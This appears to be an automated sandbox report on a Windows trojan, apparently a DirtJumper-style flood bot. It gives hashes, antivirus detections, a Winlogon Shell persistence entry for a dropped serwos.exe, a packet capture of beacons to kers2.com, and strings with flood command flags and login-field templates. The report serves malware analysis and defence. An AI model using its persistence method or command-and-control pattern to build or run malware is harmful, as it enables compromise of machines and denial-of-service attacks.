Analysis Date2015-12-14 20:17:57
MD58314c44ebbe0a61a96d79f7f87bab599
SHA146ff40039452a32bad85906c7446ca68f7fda8d9

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: sha1: size:
Section.data md5: 93b82342b4b07d71dcaeaa2467d0abd1 sha1: 6f39d22918114d7ca3c3ae3dfea8c187e0778259 size: 2048
Section.xcpad md5: sha1: size:
Section.idata md5: 93b82342b4b07d71dcaeaa2467d0abd1 sha1: 6f39d22918114d7ca3c3ae3dfea8c187e0778259 size: 2048
Section.reloc md5: c100bfc797e9d044af80a73c0f5b95c7 sha1: 74a9686f474f4d8ac5c9dfbd39c2ace66a87d317 size: 2048
Section.rsrc md5: 063e83ccc2a443299ee1a9f10af1fd9f sha1: fe63c0de82c9d82564f327876efb1c8ac71985d2 size: 512
Timestamp
VersionLegalCopyright:
PackagerVersion:
InternalName:
FileVersion:
CompanyName:
Comments:
ProductName:
ProductVersion:
FileDescription:
Packager:
OriginalFilename:
Packer
PEhash
IMPhash2db53d48dd1f35054e31bffab1f4f814
AVAd-AwareGen:Variant.Barys.20804
AVAlwil (avast)Virtu-F:Win32:Virtu-F
AVArcabit (arcavir)Gen:Variant.Barys.20804
AVAuthentiumno_virus
AVAvira (antivir)TR/Crypt.XPACK.Gen
AVBitDefenderGen:Variant.Barys.20804
AVBullGuardGen:Variant.Barys.20804
AVCA (E-Trust Ino)no_virus
AVCAT (quickheal)no_virus
AVClamAVWin.Trojan.Delf-18937
AVDr. WebTrojan.PWS.Tibia.2410
AVEmsisoftGen:Variant.Barys.20804
AVEset (nod32)Win32/Spy.Delf.PKE
AVF-SecureGen:Variant.Barys.20804
AVFortinetW32/Delf.PHQ!tr
AVFrisk (f-prot)no_virus
AVGrisoft (avg)Win32/DH{ggZn?}
AVIkarusBackdoor.Win32.HacDef
AVK7no_virus
AVKasperskyTrojan.Win32.Generic
AVMalwareBytesTrojan.Injector.DF
AVMcafeeno_virus
AVMicroWorld (escan)Gen:Variant.Barys.20804
AVMicrosoft Security EssentialsTrojan:Win32/Dishigy.J
AVRisingno_virus
AVSymantecTrojan.Dirtjump
AVTrend Microno_virus
AVTwisterTrojan.F7D5E87662F0704D
AVVirusBlokAda (vba32)no_virus
AVZillya!Trojan.Delf.Win32.60047

Runtime Details:

Screenshot

Process
↳ C:\46ff40039452a32bad85906c7446ca68f7fda8d9.exe

Creates FileC:\Windows\resources\themes\Aero\Shell\NormalColor\ShellStyle.dll
Creates FileC:\
Creates FileC:\46ff40039452a32bad85906c7446ca68f7fda8d9.exe
Creates FileC:\Users\Admin\AppData\Local\Microsoft\Windows\Caches\cversions.1.db
Creates FileC:\Users\Admin\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000007.db
Creates FileC:\desktop.ini
Creates FileC:\Windows\serwos.exe
Creates FileC:\ProgramData\systemskey.ini
Creates FileC:\ProgramData\systemskey.ini
Creates FileNsi
Creates FileC:\ProgramData\systemskey.ini
Creates Mutex
RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝
explorer.exe, serwos.exe\\x00
RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝
explorer.exe, serwos.exe\\x00
RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝
explorer.exe, serwos.exe\\x00
RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝
explorer.exe, serwos.exe\\x00
RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝
explorer.exe, serwos.exe\\x00
RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝
explorer.exe, serwos.exe\\x00
RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝
explorer.exe, serwos.exe\\x00
RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝
explorer.exe, serwos.exe\\x00
RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝
explorer.exe, serwos.exe\\x00
RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝
explorer.exe, serwos.exe\\x00
RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝
explorer.exe, serwos.exe\\x00
RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝
explorer.exe, serwos.exe\\x00
RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝
explorer.exe, serwos.exe\\x00
RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝
explorer.exe, serwos.exe\\x00

Network Details:


Raw Pcap
0x00000000 (00000)   504f5354 202f6e65 772f2048 5454502f   POST /new/ HTTP/
0x00000010 (00016)   312e310d 0a486f73 743a206b 65727332   1.1..Host: kers2
0x00000020 (00032)   2e636f6d 0d0a5573 65722d41 67656e74   .com..User-Agent
0x00000030 (00048)   3a204d6f 7a696c6c 612f352e 30202857   : Mozilla/5.0 (W
0x00000040 (00064)   696e646f 7773204e 5420352e 313b2072   indows NT 5.1; r
0x00000050 (00080)   763a3133 2e302920 4765636b 6f2f3230   v:13.0) Gecko/20
0x00000060 (00096)   31303031 30312046 69726566 6f782f31   100101 Firefox/1
0x00000070 (00112)   332e300d 0a416363 6570743a 202a2f2a   3.0..Accept: */*
0x00000080 (00128)   3b713d30 2e310d0a 41636365 70742d45   ;q=0.1..Accept-E
0x00000090 (00144)   6e636f64 696e673a 20677a69 702c6465   ncoding: gzip,de
0x000000a0 (00160)   666c6174 650d0a41 63636570 742d4c61   flate..Accept-La
0x000000b0 (00176)   6e677561 67653a20 72752d52 552c7275   nguage: ru-RU,ru
0x000000c0 (00192)   3b713d30 2e382c65 6e2d5553 3b713d30   ;q=0.8,en-US;q=0
0x000000d0 (00208)   2e352c65 6e3b713d 302e330d 0a436f6e   .5,en;q=0.3..Con
0x000000e0 (00224)   6e656374 696f6e3a 204b6565 702d416c   nection: Keep-Al
0x000000f0 (00240)   6976650d 0a436f6e 74656e74 2d4c656e   ive..Content-Len
0x00000100 (00256)   6774683a 2031370d 0a436f6e 74656e74   gth: 17..Content
0x00000110 (00272)   2d547970 653a2061 70706c69 63617469   -Type: applicati
0x00000120 (00288)   6f6e2f78 2d777777 2d666f72 6d2d7572   on/x-www-form-ur
0x00000130 (00304)   6c656e63 6f646564 0d0a0d0a 6b3d656c   lencoded....k=el
0x00000140 (00320)   39347868 33307976 316c6b6d 77         94xh30yv1lkmw

0x00000000 (00000)   504f5354 202f6e65 772f2048 5454502f   POST /new/ HTTP/
0x00000010 (00016)   312e310d 0a486f73 743a206b 65727332   1.1..Host: kers2
0x00000020 (00032)   2e636f6d 0d0a5573 65722d41 67656e74   .com..User-Agent
0x00000030 (00048)   3a204f70 6572612f 392e3830 20285769   : Opera/9.80 (Wi
0x00000040 (00064)   6e646f77 73204e54 20362e31 3b20574f   ndows NT 6.1; WO
0x00000050 (00080)   5736343b 20553b20 45646974 696f6e20   W64; U; Edition 
0x00000060 (00096)   556e6974 6564204b 696e6764 6f6d204c   United Kingdom L
0x00000070 (00112)   6f63616c 3b207275 29205072 6573746f   ocal; ru) Presto
0x00000080 (00128)   2f322e31 302e3238 39205665 7273696f   /2.10.289 Versio
0x00000090 (00144)   6e2f372e 30350d0a 41636365 70743a20   n/7.05..Accept: 
0x000000a0 (00160)   2a2f2a3b 713d302e 310d0a41 63636570   */*;q=0.1..Accep
0x000000b0 (00176)   742d456e 636f6469 6e673a20 677a6970   t-Encoding: gzip
0x000000c0 (00192)   2c646566 6c617465 0d0a4163 63657074   ,deflate..Accept
0x000000d0 (00208)   2d4c616e 67756167 653a2072 752d5255   -Language: ru-RU
0x000000e0 (00224)   2c72753b 713d302e 382c656e 2d55533b   ,ru;q=0.8,en-US;
0x000000f0 (00240)   713d302e 352c656e 3b713d30 2e330d0a   q=0.5,en;q=0.3..
0x00000100 (00256)   436f6e6e 65637469 6f6e3a20 4b656570   Connection: Keep
0x00000110 (00272)   2d416c69 76650d0a 436f6e74 656e742d   -Alive..Content-
0x00000120 (00288)   4c656e67 74683a20 31370d0a 436f6e74   Length: 17..Cont
0x00000130 (00304)   656e742d 54797065 3a206170 706c6963   ent-Type: applic
0x00000140 (00320)   6174696f 6e2f782d 7777772d 666f726d   ation/x-www-form
0x00000150 (00336)   2d75726c 656e636f 6465640d 0a0d0a6b   -urlencoded....k
0x00000160 (00352)   3d656c39 34786833 30797631 6c6b6d77   =el94xh30yv1lkmw
0x00000170 (00368)                                         


Strings
StringX
TObject
u:hD
SVWUQ
Z]_^[
SVWU
YZ]_^[
SVWU
]_^[
SVWU
w;;t$
]_^[
SVWU
]_^[
SVWUQ
Z]_^[
SVWU
YZ]_^[
SVWU
uW;{
u:;{
]_^[
ZYYd
ZYYd
SVWU
]_^[
YZ^[
SVWU
]_^[
ZYYd
_^[YY]
QSVW
UhN"@
ZYYd
hU"@
_^[Y]
SVWU
$;L$
$)D$
YZ]_^[
QSVW
ZYYd
_^[Y]
YZXu
SVWU
C<"u1S
Q<"u8S
7CF;
7CF;
]_^[
Ht Ht.
r/f=
w)f%
SVWQ
SVWR
	w%9
~KxI[)
2_^[
YZXt5
YX_^

hd1@
Uh=1@
ZYYd
hD1@
SOFTWARE\Borland\Delphi\RTL
FPUMaskValue
PPRTj
YYZX
YZXtp
VWUd
SPRQ
T$(j
SVWU
]_^[
]_^[
d$,1
,t\=
t=HtN
r6t0
t.Ht
Ph*7@
ZYYd
_^[]
Uhr8@
ZYYd
_^[]
SVWU
]_^[
;_^[
t!R:
SVWRP
Z_^[X
uXJt
uAJt
u:Jt
It2S
t&J|
N|*9
t1SVW
;_^[
PSVW
_^[X
_^[X
ZYYd
_^[YY]
ZYYd
Uh&C@
ZYYd
h-C@
Uh~C@
ZYYd
ZYYd
ZYYd
ZYYd
UhIG@
ZYYd
hPG@
| C3
	TRegistry
TCommand0
h8J@
ZYYd
h$J@
QSVW
_^[Y]
QZ^&
QSVW
_^[Y]
SVW3
ZYYd
ZYYd
^[YY]
QQQQQQSVW
UhaY@
ZYYd
hhY@
ZYYd
^[Y]
ZYYd
ZYYd
SVW3
ZYYd
ZYYd
gui,vkyoiq
Software
Microsoft
Windows NT
CurrentVersion
Winlogon
explorer.exe,
Shell
QQQQQQQSVW3
UhO`@
h|`@
Uh*`@
ZYYd
ZYYd
hV`@
gui,vkyoiq
hh_@
; WOW64
Bangladesh
Russia
United Kingdom
Egypt
China
Iran
Mongolia
India
Grenada
Thailand
Romania
Germany
France
Ukraine
United States
ZYYd
ZYYd
_^[YY]
QQQQQSVW
Uhce@
Uh>e@
ZYYd
ZYYd
hje@
.com
.net
.org
http://
h0h@
h<h@
hLh@
hph@
h|h@
h0h@
hph@
h0h@
hHi@
h`i@
ZYYd
Mozilla/5.0 (Windows NT
; rv:
.0) Gecko/20100101 Firefox/
Opera/9.80 (Windows NT
; U; Edition
 Local; ru) Presto/2.10.289 Version/
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT
; Trident/4.0; SLCC2; .NET CLR 2.0.
; .NET CLR 3.5.
; .NET CLR 3.0.
h\n@
hpn@
h|n@
hTo@
hto@
ZYYd
https://
http://
error1
error2
error3 (
 HTTP/1.1
Host:
User-Agent:
Accept: */*;q=0.1
Accept-Encoding: gzip,deflate
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Connection: Keep-Alive
Referer:
POST
Content-Length:
Content-Type: application/x-www-form-urlencoded
error4 (Send)
ZYYd
ZYYd
SVWU
]_^[
SVWU
]_^[
QSVW
_^[Y]
Sh|t@
_^[]
QQQQQSVW
UhMy@
ZYYd
ZYYd
hTy@
SVW3
ZYYd
UhV{@
ZYYd
ZYYd
kkm,|ampqcwo{p
QSVW3
ZYYd
ZYYd
ZYYd
ZYYd
ZYYd
ZYYd
ZYYd
ZYYd
ZYYd
olg,5otbo
1til2
3C6?:?H@85;?H@F4;@46:6<,4.=2:@H2
"7xqrD
<qrcj=/oiqX
POST
200 OK
-get
-post1
-post2
-ip
-ip2
-request
login=[1000]&pass=[1000]&password=[50]&log=[50]&passwrd=[50]&user=[50]&username=[50]&vb_login_username=[50]&vb_login_md5password=[50]
-timeout
-thread
https://
http://
POST
 HTTP/1.1
Host:
User-Agent:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Connection: Keep-Alive
Referer: http://
Content-Length:
Content-Type: application/x-www-form-urlencoded
GET
Referer:
ZYYd
ZYYd
Error
Runtime error     at 00000000
0123456789ABCDEF
kernel32.dll
DeleteCriticalSection
LeaveCriticalSection
EnterCriticalSection
InitializeCriticalSection
VirtualFree
VirtualAlloc
LocalFree
LocalAlloc
GetTickCount
QueryPerformanceCounter
GetVersion
GetCurrentThreadId
GetThreadLocale
GetStartupInfoA
GetModuleFileNameA
GetLocaleInfoA
GetLastError
GetCommandLineA
FreeLibrary
ExitProcess
WriteFile
UnhandledExceptionFilter
SetFilePointer
SetEndOfFile
RtlUnwind
ReadFile
RaiseException
GetStdHandle
GetFileSize
GetFileType
CreateFileA
CloseHandle
user32.dll
GetKeyboardType
MessageBoxA
CharNextA
advapi32.dll
RegQueryValueExA
RegOpenKeyExA
RegCloseKey
oleaut32.dll
SysFreeString
kernel32.dll
TlsSetValue
TlsGetValue
LocalAlloc
GetModuleHandleA
advapi32.dll
RegSetValueExA
RegOpenKeyExA
RegFlushKey
RegCreateKeyExA
RegCloseKey
OpenThreadToken
OpenProcessToken
GetTokenInformation
FreeSid
EqualSid
AllocateAndInitializeSid
kernel32.dll
Sleep
MoveFileA
GetLastError
GetCurrentThread
GetCurrentProcess
FindFirstFileA
FindClose
FileTimeToLocalFileTime
FileTimeToDosDateTime
ExitThread
CreateThread
CloseHandle
wsock32.dll
WSAStartup
gethostbyname
socket
shutdown
setsockopt
send
recv
inet_addr
htons
connect
closesocket
shell32.dll
SHFileOperationA
SHGetSpecialFolderPathA
0,080<0@0D0H0L0P0T0b0j0r0z0
1"1*121:1B1J1v1~1
1H2O2
4,5p5
7*8G8R8]8e8o8y8
9%9-989>9K9Q9k9r9|9
:+:J:b:j:
;/;M;w<
=!>?>D>J>
?#?9?_?k?s?
0-050;0D0K0P0V0i0r0
1#121B1b1z1
2&262<2D2
2-343D3N3T3\3b3h3o3y3 4I4g4s4{4
5'5O5h5
8'9P9W9^9.:C:v:
:(;/;
<-<6<=?E?N?
1/1F1[1
2V3j3r3
4(4;4k4
7&7>7`7
738F8Z8
9,969[9e9o9w9}9
1*212C2a2j2v2}2
3;3G3N3X3b3y3
3&4;4L4V4^4f4n4v4
5&52575<5C5J5T5k5w5
6&6.666>6F6N6V6^6f6n6v6~6
7+777D7V7
7D8P8d8l8p8t8x8|8
8D8G9r9
:7:O:
=6=Y=
>#>1>?>Q>^>
1!1%1)1-1115191=1A1E1I1M1Q1U1\1j1x1
2 2J3X3
4%4E4I4M4Q4U4Y4x4
5$5Q5
7'777G7d7
:6:Z:
: ;8;Q;j;o;w;|;
<9<k<|<
I0s0
0)1D1
818W8q8
:4:<:K:\:h:
:_;v;
<!<\<r<w<
=!='=8=L=X=|=
>6>N>f>
?.?G?k?
0?1]1|1
2!2.2?2V2z2
3,3@3\3l3
434g4
435D5Y5
6W6p6
7'7E7Y7
7+8F8z8
8+9Q9
:1:6:;:O:T:Y:o:t:y:~:
: ;<;H;\;a;f;z;
=0=F=[={=
2"2-2?2T2X2\2`2d2h2l2p2t2x2|2
004080
&=O8
cdcdfd
UTypes
System
SysInit
WinSock
KWindows